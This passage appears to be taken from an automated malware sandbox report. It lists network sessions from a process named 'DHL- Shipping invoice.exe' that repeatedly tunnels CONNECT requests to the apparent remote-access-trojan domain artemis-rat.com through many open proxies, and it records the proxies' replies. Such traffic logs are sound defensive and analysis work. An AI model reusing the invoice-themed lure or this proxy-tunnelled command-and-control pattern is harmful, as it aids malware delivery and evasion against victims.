                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.891371012 CET72INHTTP/1.1 200 Connection established
                            Proxy-Agent: Fortinet-Proxy/1.0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1512192.168.2.454569166.62.121.102458866484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.645066977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1513192.168.2.453845146.59.18.246207346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.649636030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1514192.168.2.454460121.66.198.7641456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.658540964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1515192.168.2.45457023.137.248.19788886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.661679029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1516192.168.2.454455101.133.162.2388996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.671498060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.993387938 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1517192.168.2.454618172.64.152.98806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.701421976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.789175034 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1518192.168.2.45447443.129.228.4678916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.702095032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1519192.168.2.454426175.183.82.22181936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.702572107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1520192.168.2.45453438.180.36.19806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.703347921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.966872931 CET176INHTTP/1.1 404 Not Found
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Length: 19
                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                            Data Ascii: 404 page not found


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1521192.168.2.454586147.75.34.8694016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.703711033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.868005991 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1522192.168.2.45441543.231.22.229806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.714307070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.088212013 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1523192.168.2.449816193.138.178.682826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.720020056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.815818071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953387976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.940675974 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1524192.168.2.4546075.135.83.214806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.720292091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.278774023 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1525192.168.2.45457780.67.8.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.734827042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1526192.168.2.452829209.222.97.30158056484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.734915018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.750159979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.765835047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.859487057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1527192.168.2.45450814.50.81.64806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.735615015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1528192.168.2.454612147.75.34.85100076484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.753763914 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:05.918358088 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1529192.168.2.45462538.162.22.11931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.755786896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.060519934 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1530192.168.2.45287851.15.211.42163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.770081043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.617413044 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1531192.168.2.44981554.36.122.16297966484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.770184994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.859235048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953319073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.062547922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.077902079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.249767065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:54.249815941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:18.265382051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:06.274782896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1532192.168.2.449802162.214.225.223533406484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.772339106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.859215021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.953335047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.062537909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1533192.168.2.453884160.153.245.187355736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.772871017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1534192.168.2.45462812.186.205.123806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.871675014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1535192.168.2.453928167.86.96.18731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.872437000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.360971928 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1536192.168.2.45465143.135.159.784436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.872536898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
